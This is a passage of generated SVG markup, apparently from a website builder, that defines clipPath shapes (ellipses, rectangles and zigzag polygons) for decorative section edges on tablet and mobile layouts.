rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.60325" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.61275" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.62225" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.63175" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.64125" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.6507499999999999" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.66025" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.66975" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.67925" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.68875" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.69825" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.70775" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.7172499999999999" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.72675" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.73625" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.74575" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.75525" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.7647499999999999" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.77425" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.78375" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.79325" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.80275" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.81225" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.82175" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.8312499999999999" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.84075" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.85025" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.85975" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.86925" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.87875" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.88825" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.8977499999999999" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.90725" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.91675" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.92625" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.93575" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.9452499999999999" rx="0.76" ry="0.004750"></ellipse></clipPath><clipPath id="clip-tablet-tablet-bottom-5u9uc4t2rbz31" class="decoration-clip clip-path-tablet-tablet-bottom" clipPathUnits="objectBoundingBox" data-screen="tablet-" decoration-type="none" pointer-width="5" pointer-height="5" style="zigzag" clip-path="url(#clip-tablet-tablet-left-5u9uc4t2rbz31)"><polygon points="0 0, 0 1, 1 1, 1 0"></polygon></clipPath><clipPath id="clip-tablet-tablet-left-5u9uc4t2rbz31" class="decoration-clip clip-path-tablet-tablet-left" clipPathUnits="objectBoundingBox" data-screen="tablet-" pointer-width="29" pointer-height="66" style="curves" decoration-type="none" clip-path="url(#clip-tablet-right-5u9uc4t2rbz31)"><polygon points="0 0, 0 1, 1 1, 1 0"></polygon><ellipse cx="0.66" cy="0.158333" rx="0.66" ry="0.158333"></ellipse><ellipse cx="0.66" cy="0.474999" rx="0.66" ry="0.158333"></ellipse><ellipse cx="0.66" cy="0.7916650000000001" rx="0.66" ry="0.158333"></ellipse></clipPath><clipPath id="clip-tablet-tablet-mobile-bottom-5u9uc4t2rbz31" class="decoration-clip clip-path-tablet-tablet-mobile-bottom" clipPathUnits="objectBoundingBox" data-screen="tablet-" decoration-type="divider" pointer-width="5" pointer-height="5" style="zigzag" clip-path="url(#clip-tablet-tablet-mobile-left-5u9uc4t2rbz31)"><polygon points="0 0, 0 0.95, 0.76 0.95, 0.76 0.95, 0.766 1, 0.772 0.95, 0.778 1, 0.784 0.95, 0.79 1, 0.796 0.95, 0.802 1, 0.808 0.95, 0.8140000000000001 1, 0.8200000000000001 0.95, 0.8260000000000001 1, 0.8320000000000001 0.95, 0.838 1, 0.844 0.95, 0.85 1, 0.856 0.95, 0.862 1, 0.868 0.95, 0.874 1, 0.88 0.95, 0.886 1, 0.892 0.95, 0.898 1, 0.904 0.95, 0.91 1, 0.916 0.95, 0.922 1, 0.928 0.95, 0.934 1, 0.94 0.95, 0.946 1, 0.952 0.95, 0.958 1, 0.964 0.95, 0.97 1, 0.976 0.95, 0.982 1, 0.988 0.95, 0.994 1, 1 0.95, 1 0"></polygon></clipPath><clipPath id="clip-tablet-tablet-mobile-left-5u9uc4t2rbz31" class="decoration-clip clip-path-tablet-tablet-mobile-left" clipPathUnits="objectBoundingBox" data-screen="tablet-" pointer-width="1" pointer-height="76" style="curves" decoration-type="none" clip-path="url(#clip-tablet-right-5u9uc4t2rbz31)"><polygon points="0 0, 0 1, 1 1, 1 0"></polygon><ellipse cx="0.76" cy="0.00475" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.014249999999999999" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.02375" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.03325" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.042749999999999996" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.05225" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.06175" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.07125" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.08075" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.09025" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.09974999999999999" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.10925" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.11875" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.12825" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.13774999999999998" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.14725" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.15675" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.16625" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.17575" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.18525" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.19475" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.20425" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.21375" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.22325" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.23274999999999998" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.24225" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.25175" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.26125" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.27075" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.28025" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.28975" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.29925" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.30874999999999997" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.31825" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.32775" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.33725" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.34675" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.35625" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.36574999999999996" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.37525" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.38475" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.39425" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.40375" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.41325" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.42275" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.43224999999999997" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.44175" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.45125" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.46075" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.47025" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.47975" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.48924999999999996" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.49874999999999997" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.50825" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.5177499999999999" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.52725" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.53675" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.54625" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.55575" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.56525" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.57475" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.5842499999999999" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.59375" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.60325" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.61275" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.62225" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.63175" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.64125" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.6507499999999999" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.66025" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.66975" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.67925" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.68875" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.69825" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.70775" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.7172499999999999" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.72675" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.73625" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.74575" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.75525" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.7647499999999999" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.77425" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.78375" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.79325" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.80275" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.81225" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.82175" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.8312499999999999" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.84075" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.85025" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.85975" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.86925" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.87875" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.88825" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.8977499999999999" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.90725" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.91675" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.92625" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.93575" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.9452499999999999" rx="0.76" ry="0.004750"></ellipse></clipPath><clipPath id="clip-tablet-right-5u9uc4t2rbz31" class="decoration-clip clip-path-tablet-right" clipPathUnits="objectBoundingBox" data-screen="tablet-" pointer-width="3" pointer-height="35" style="zigzag" decoration-type="none"><polygon points="0 0, 0 1, 1 1, 1 0"></polygon></clipPath><clipPath id="clip-mobile-bottom-5u9uc4t2rbz31" class="decoration-clip clip-path-mobile-bottom" clipPathUnits="objectBoundingBox" data-screen="mobile-" decoration-type="none" pointer-width="5" pointer-height="5" style="zigzag" clip-path="url(#clip-mobile-left-5u9uc4t2rbz31)"><polygon points="0 0, 0 1, 1 1, 1 0"></polygon></clipPath><clipPath id="clip-mobile-left-5u9uc4t2rbz31" class="decoration-clip clip-path-mobile-left" clipPathUnits="objectBoundingBox" data-screen="mobile-" pointer-width="29" pointer-height="66" style="curves" decoration-type="none" clip-path="url(#clip-right-5u9uc4t2rbz31)"><polygon points="0 0, 0 1, 1 1, 1 0"></polygon><ellipse cx="0.66" cy="0.158333" rx="0.66" ry="0.158333"></ellipse><ellipse cx="0.66" cy="0.474999" rx="0.66" ry="0.158333"></ellipse><ellipse cx="0.66" cy="0.7916650000000001" rx="0.66" ry="0.158333"></ellipse></clipPath><clipPath id="clip-mobile-mobile-bottom-5u9uc4t2rbz31" class="decoration-clip clip-path-mobile-mobile-bottom" clipPathUnits="objectBoundingBox" data-screen="mobile-" decoration-type="divider" pointer-width="5" pointer-height="5" style="zigzag" clip-path="url(#clip-mobile-mobile-left-5u9uc4t2rbz31)"><polygon points="0 0, 0 0.95, 0.76 0.95, 0.76 0.95, 0.766 1, 0.772 0.95, 0.778 1, 0.784 0.95, 0.79 1, 0.796 0.95, 0.802 1, 0.808 0.95, 0.8140000000000001 1, 0.8200000000000001 0.95, 0.8260000000000001 1, 0.8320000000000001 0.95, 0.838 1, 0.844 0.95, 0.85 1, 0.856 0.95, 0.862 1, 0.868 0.95, 0.874 1, 0.88 0.95, 0.886 1, 0.892 0.95, 0.898 1, 0.904 0.95, 0.91 1, 0.916 0.95, 0.922 1, 0.928 0.95, 0.934 1, 0.94 0.95, 0.946 1, 0.952 0.95, 0.958 1, 0.964 0.95, 0.97 1, 0.976 0.95, 0.982 1, 0.988 0.95, 0.994 1, 1 0.95, 1 0"></polygon></clipPath><clipPath id="clip-mobile-mobile-left-5u9uc4t2rbz31" class="decoration-clip clip-path-mobile-mobile-left" clipPathUnits="objectBoundingBox" data-screen="mobile-" pointer-width="1" pointer-height="76" style="curves" decoration-type="none" clip-path="url(#clip-right-5u9uc4t2rbz31)"><polygon points="0 0, 0 1, 1 1, 1 0"></polygon><ellipse cx="0.76" cy="0.00475" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.014249999999999999" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.02375" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.03325" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.042749999999999996" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.05225" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.06175" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.07125" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.08075" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.09025" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.09974999999999999" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.10925" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.11875" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.12825" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.13774999999999998" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.14725" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.15675" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.16625" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.17575" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.18525" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.19475" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.20425" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.21375" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.22325" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.23274999999999998" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.24225" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.25175" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.26125" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.27075" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.28025" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.28975" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.29925" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.30874999999999997" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.31825" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.32775" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.33725" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.34675" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.35625" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.36574999999999996" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.37525" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.38475" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.39425" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.40375" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.41325" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.42275" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.43224999999999997" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.44175" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.45125" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.46075" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.47025" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.47975" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.48924999999999996" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.49874999999999997" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.50825" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.5177499999999999" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.52725" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.53675" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.54625" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.55575" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.56525" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.57475" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.5842499999999999" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.59375" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.60325" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.61275" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.62225" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.63175" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.64125" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.6507499999999999" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.66025" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.66975" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.67925" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.68875" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.69825" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.70775" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.7172499999999999" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.72675" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.73625" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.74575" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.75525" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.7647499999999999" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.77425" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.78375" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.79325" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.80275" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.81225" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.82175" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.8312499999999999" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.84075" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.85025" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.85975" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.86925" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.87875" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.88825" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.8977499999999999" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.90725" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.91675" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.92625" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.93575" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.9452499999999999" rx="0.76" ry="0.004750"></ellipse></clipPath><clipPath id="clip-mobile-bottom-5u9uc4t2rbz31" class="decoration-clip clip-path-mobile-bottom" clipPathUnits="objectBoundingBox" data-screen="mobile-" decoration-type="none" pointer-width="5" pointer-height="5" style="zigzag" clip-path="url(#clip-mobile-left-5u9uc4t2rbz31)"><polygon points="0 0, 0 1, 1 1, 1 0"></polygon></clipPath><clipPath id="clip-mobile-left-5u9uc4t2rbz31" class="decoration-clip clip-path-mobile-left" clipPathUnits="objectBoundingBox" data-screen="mobile-" pointer-width="1" pointer-height="76" style="curves" decoration-type="none" clip-path="url(#clip-mobile-right-5u9uc4t2rbz31)"><polygon points="0 0, 0 1, 1 1, 1 0"></polygon><ellipse cx="0.76" cy="0.00475" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.014249999999999999" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.02375" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.03325" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.042749999999999996" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.05225" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.06175" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.07125" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.08075" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.09025" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.09974999999999999" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.10925" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.11875" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.12825" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.13774999999999998" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.14725" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.15675" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.16625" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.17575" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.18525" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.19475" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.20425" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.21375" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.22325" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.23274999999999998" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.24225" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.25175" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.26125" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.27075" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.28025" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.28975" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.29925" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.30874999999999997" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.31825" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.32775" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.33725" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.34675" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.35625" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.36574999999999996" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.37525" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.38475" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.39425" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.40375" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.41325" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.42275" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.43224999999999997" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.44175" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.45125" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.46075" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.47025" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.47975" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.48924999999999996" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.49874999999999997" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.50825" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.5177499999999999" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.52725" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.53675" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.54625" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.55575" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.56525" rx="0.76" 